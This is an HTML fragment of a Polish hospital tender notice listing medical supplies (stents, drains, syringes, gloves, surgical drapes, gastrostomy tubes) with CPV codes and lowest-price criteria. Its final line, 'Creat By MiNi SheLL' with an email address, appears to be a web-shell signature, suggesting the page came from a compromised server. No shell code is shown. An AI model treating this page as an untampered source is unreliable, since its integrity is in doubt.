<p><b>CZĘŚĆ Nr:</b> 37 <b>NAZWA:</b> PAKIET XIII  SPRZĘT J.U. STERYLNY  - ZESTAWY MEDYCZNE 
Zadanie nr 34.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 34
Zestaw do szynowania moczowodów - cewnik typu Pigtail, z poliuretanu, z podziałką długości min. co 1 cm, prowadnik, sztywny popychacz z ruchomym elementem wewnętrznym umożliwiającym cofanie i obracanie podczas zakładania,  zaciski z silikonową szpulką do mocowania cewnika - rozmiar zgodnie z opisem  
1. Zestaw do szynowania moczowodów - sterylny  6F/28  - 5 kpl.	
2. Zestaw do szynowania moczowodów - sterylny  7F/26  - 5 kpl.	
3. Zestaw do szynowania moczowodów - sterylny  7F/28  - 10 kpl.	
4. Zestaw do szynowania moczowodów - sterylny 7F/30 (dopuszcza się 8F/30)   - 5 kpl..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.20-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 38 <b>NAZWA:</b> PAKIET XIV  SPRZĘT J.U. STERYLNY  - DRENY KEHR 
Zadanie nr 35.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 35 
1. Dren Kehr 700-1000  x 300 mm  CH 14   - 10	szt.	
2. Dren Kehr  j.w.                       CH 16   - 10	szt. 	
3. Dren Kehr  j.w.                       CH 18   - 10	szt. 	
4. Dren Kehr  j.w.                       CH 22   - 10	szt. 	
5. Dren do ran chirurgicznych dachówkowy 2,5/25 mm   - 30 szt. 	
6. Dren tkankowy 18 - rurkowy 250 mm x 50 mm   - 20 szt. 	
7. Łącznik do drenów prosty  - 30 szt. 
8. Łącznik do drenów Y   - 100 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.40-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 39 <b>NAZWA:</b> PAKIET XV  SPRZĘT J.U. STERYLNY  - STRZYKAWKI
Zadanie nr 36.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 36 	
1. Strzykawka LUER  jednorazowego użytku typ JANETA 100 ml   - 4400 szt.	
2. Strzykawka LUER jednorazowego użytku 10 ml - strzykawka dwuczęściowa wykonana z polipropylenu/polietylenu; stożek LUER o zbieżności  6 : 10: kryza ograniczająca wysuwanie się tłoka; opakowanie jednostkowe typu blister - pack.  Położenie stożka LUER w strzykawkach:  2 ml - centryczne; 5 ml, 10 i 20 ml - niecentryczne. Opakowanie jednostkowe typu blister - pack. Strzykawka z jednostronną lub dwustronną skalą,  z przezroczystym lub kontrastującym tłokiem
Opakowanie zbiorcze: a100 szt.    - 1200 opak.	
3. Strzykawka LUER  jednorazowego użytku 5 ml - strzykawka dwuczęściowa wykonana z polipropylenu/polietylenu; stożek LUER o zbieżności  6 : 10: kryza ograniczająca wysuwanie się tłoka; opakowanie jednostkowe typu blister - pack.  Położenie stożka LUER w strzykawkach:  2 ml - centryczne; 5 ml, 10 i 20 ml - niecentryczne. Opakowanie jednostkowe typu blister - pack. Strzykawka z  jednostronną lub dwustronną skalą,  z przezroczystym lub kontrastującym tłokiem 
Opakowanie zbiorcze: a100 szt.   - 1100 opak. 	
4. Strzykawka LUER  jednorazowego użytku 2 ml  - strzykawka dwuczęściowa wykonana z polipropylenu/polietylenu; stożek LUER o zbieżności  6 : 10: kryza ograniczająca wysuwanie się tłoka; opakowanie jednostkowe typu blister - pack.  Położenie stożka LUER w strzykawkach:  2 ml - centryczne; 5 ml, 10 i 20 ml - niecentryczne. Opakowanie jednostkowe typu blister - pack. Z jednostronną lub dwustronną skalą,  z przezroczystym lub kontrastującym tłokiem 
Opakowanie zbiorcze: a100 szt.    - 1100 opak. 	
5. Strzykawka LUER  jednorazowego użytku 20 ml  - strzykawka dwuczęściowa wykonana z polipropylenu/polietylenu; stożek LUER o zbieżności  6 : 10: kryza ograniczająca wysuwanie się tłoka; opakowanie jednostkowe typu blister - pack.  Położenie stożka LUER w strzykawkach:  2 ml - centryczne; 5 ml, 10 i 20 ml - niecentryczne. Opakowanie jednostkowe typu blister - pack. Z jednostronną lub dwustronną skalą,  z przezroczystym lub kontrastującym tłokiem
Opakowanie zbiorcze: a100 szt.    - 1650 opak. 	
6. Strzykawka LUER   jednorazowego użytku do insuliny 1 ml  - trzyczęściowa, z igłą, tłoczek gumowy; centrycznie umieszczony stożek LUER o zbieżności  6 : 100; działka elementarna 0,05 ml, kryza ograniczająca wysuwanie się tłoka; czytelna i niezmywalna skala; dołączona igła iniekcyjna o grubości    0,45 x 10 mm; opakowanie jednostkowe  typu  blister - pack. (Dopuszcza się  0,29 x 13mm)   -500 szt.
7. Strzykawka LUER jednorazowego użytku do tuberkuliny  1 ml - trzyczęściowa, z igłą; tłoczek gumowy; centrycznie umieszczony stożek LUER o zbieżności 6:100; działka elementarna  0,05 ml; kryza ograniczająca wysuwanie się tłoka; czytelna i niezmywalna skala; dołączona igła iniekcyjna o grubości   0,45 x 13 mm; opakowanie jednostkowe typu blister - pack. (Dopuszcza się   0,45 x 10 mm)   - 2900 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.10-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 40 <b>NAZWA:</b> PAKIET XV  SPRZĘT J.U. STERYLNY  - STRZYKAWKI
Zadanie nr 37.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 37	
1. Strzykawka z gwintem 10 ml - strzykawka z gwintem, z jednostronną lub dwustronną skalą,  z przezroczystym lub kontrastującym tłokiem  - 1300 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.10-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 41 <b>NAZWA:</b> PAKIET XVI  SPRZĘT JEDNORAZOWY NA BLOK OPERACYJNY
Zadanie nr 38.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 38 	
1. Zestaw drenów płuczących z dwiema igłami przekłuwającymi, kompatybilny z aparatem Karl Storz znajdującym się na wyposażeniu szpitala (histeroskopia)  - 200 szt.
2. Igła Veresa do wytworzenia odmy otrzewnej jednorazowego użytku, długości 150 mm. Igła wytworzona ze stali nierdzewnej, kaliber 14 G, wyposażona w przezroczystą rękojeść z czerwonym wskaźnikiem bezpieczeństwa   - 200 szt. 
3. Organizator przewodów sterylny o wymiarach 14 x 4 cm, pakowany indywidualnie   - 400 szt. 
4. Serweta na przewód kamery sterylna o wymiarach 250 cm x 13 cm, pakowana indywidualnie   - 1500 szt. 	
5. Obłożenie do artroskopii, sterylne o wymiarach 230 cm x 320 cm ze zbiornikiem na płyny, podłączeniem ssaka, organizatorem przewodów wykonane z materiału wodoszczelnego   - 50 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.20-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 42 <b>NAZWA:</b> PAKIET XVII  SPRZĘT J.U. NIESTERYLNY - WŁÓKNINA I INNE PRODUKTY 
Zadanie nr 39.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 39
Bielizna operacyjna  z włókniny medycznej - niesterylna - minimalne wymagania jakościowe, typ i rozmiar zgodnie z opisem 	
1. Czepek jednorazowego użytku damski   - 10500 szt. 	
2. Czepek jednorazowego użytku męski   - 5000 szt. 	
3. Fartuch - fizelina  biały - niesterylny  - 4500 szt. 	
4. Fartuch foliowy - niesterylny rozm. XXXL   - 4500 szt.	
5. Maska chirurgiczna jednorazowego użytku  - 27300 szt.	
6. Ochraniacze na obuwie  - 1700 par	
7. Podkład nieprzemakalny z folią  - niesterylny 150 - 160 x 200 cm   - 7900 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.51.80.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 43 <b>NAZWA:</b> PAKIET XVII  SPRZĘT J.U. NIESTERYLNY - WŁÓKNINA I INNE PRODUKTY 
Zadanie nr 40.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 40
1. Myjka do toalety pacjenta - do toalety chorego, rękawica bez palca, strona wewnętrzna folia - strona zewnętrzna delikatna włóknina - fizelinowa, jednorazowego użytku.
Opakowanie:  a50 szt.    - 155 opak..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.51.80.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 44 <b>NAZWA:</b> PAKIET XVIII SPRZĘT J.U. NIESTERYLNY - POZOSTAŁY
Zadanie nr 41.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 41 
Pojemniki na zużyty sprzęt medyczny typu igły, kaniule, igły punkcyjne -   wykonany z twardego PCV; zapobiegającego ewentualnym przebiciom. Pojemnik powinien posiadać odpowiedni otwór z ząbkami do zdejmowania igieł; pokrywa z zamknięciem uniemożliwiającym ponowne otwarcie, celem przesypywania zużytego sprzętu. Tworzywo  dopuszczone do spalania razem z niebezpiecznymi odpadami medycznymi. Wielkość zgodnie z rozmiarami podanymi w opisie	
1. Pojemnik do zużytych igieł    0,6 - 0,7 l    - 650 szt.
2. Pojemnik do zużytych igieł   1 l    - 1200 szt.	
3. Pojemnik do zużytych kaniul długich  2 l   - 1650 szt.	
4. Pojemnik do zużytych kaniul długich  1 ,3 - 1,7 l   - 550 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.14.20-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 45 <b>NAZWA:</b> PAKIET XVIII  SPRZĘT J.U. NIESTERYLNY  - POZOSTAŁY 
Zadanie nr 42.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 42 
Rękawice diagnostyczne lateksowe - opak. a100 szt, zgodnie z normą EN 455- 1.2.3; potwierdzone przez dołączony do oferty certyfikat jednostki notyfikowanej, niska zawartość pudru, cienkie, pasujące na obie dłonie rolowany mankiet, oznakowane CE, wyposażone w dodatkową wyraźną teksturę na końcach palców ułatwiających chwytanie.
1. Rękawice diagnostyczne latex - a100 szt.  rozm. S   - 6000 opak.   
2. Rękawice diagnostyczne latex - a100 szt.  rozm. M   - 6000 opak. 
3. Rękawice diagnostyczne latex - a100 szt.  rozm. L    - 650 opak..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.14.20-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 46 <b>NAZWA:</b> PAKIET XVIII  SPRZĘT J.U. NIESTERYLNY  - POZOSTAŁY 
Zadanie nr 43.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 43 
Rękawice foliowe - wykonane z folii, polipropylen 	
1. Rękawice foliowe damskie  - a100 szt.   - 1000 opak.	
2. Rękawice foliowe męskie  - a 100 szt.   - 650 opak..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.14.20-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 47 <b>NAZWA:</b> PAKIET XIX  SPRZĘT J.U. STERYLNY  - OBŁOŻENIA UROLOGICZNE
Zadania nr 44.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 44 
1. Obłożenie urologiczne - sterylne bez latexu z workiem do zbiórki płynów (z sitem)- serweta 185 x 200 cm okno suprapubic 7 cm x 10 cm  z otworem w okolicy nadłonowej  o średnicy 7 cm i osłoną na palec z neoprenu do badania pacjenta połączony z serwetą. Wytrzymały na rozerwanie w stanie mokrym  - 150 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 48 <b>NAZWA:</b> PAKIET XX  - SONDY GASTROSTOMIJNE
Zadanie nr 45.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 45 
SONDY GASTROSTOMIJNE	
1. Sonda gastrostomijna jednorazowego użytku wykonana z silikonu, przeznaczona do długotrwałego żywienia. Posiada oznakowanie głębokości ze skalą w cm, posiada balon, centralnie położony otwór końcówki dalszej oraz otwory boczne minimalizujące zatkanie sondy. Ruchomy krążek do umocowania sondy. Część dalsza sondy posiada trzy wejścia, dwa z nich zamykane korkiem. Centralne wejście służy do podawania pokarmu, boczne do płukania sondy i podawania leków, a trzecie wejście z samouszczelniającym zaworem wypełnianiu balonu
długość 17 cm, balon 30 ml    CH 22  - 5 szt.	
2. J. w. długość 17 cm, balon 30 ml  CH24  - 10 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 49 <b>NAZWA:</b> PAKIET XXI  - SPRZĘT DLA BLOKU OPERACYJNEGO (folie operacyjne)
Zadanie nr 46.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 46 
FOLIE OPERACYJNE	
I. Folia operacyjna - sterylna, pakowana indywidualnie (wyliczenia przyjęte dla kartonów a10 szt.)		
1. Szerokość 10 - 15 cm / długość 12 - 20 cm   - 12 opak. 	
2. Szerokość 20 - 30 cm / długość 28 - 35 cm   - 20 opak. 	
3. Szerokość 28 - 35 cm / długość 35 - 45 cm   - 20 opak. 	
II. Folia na wkłucia centralne o wym. 10 x 12 cm  - 100 szt.	
III. Folia sterylna - do mikroskopu operacyjnego Moller - Uniwersa 300    - 10 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com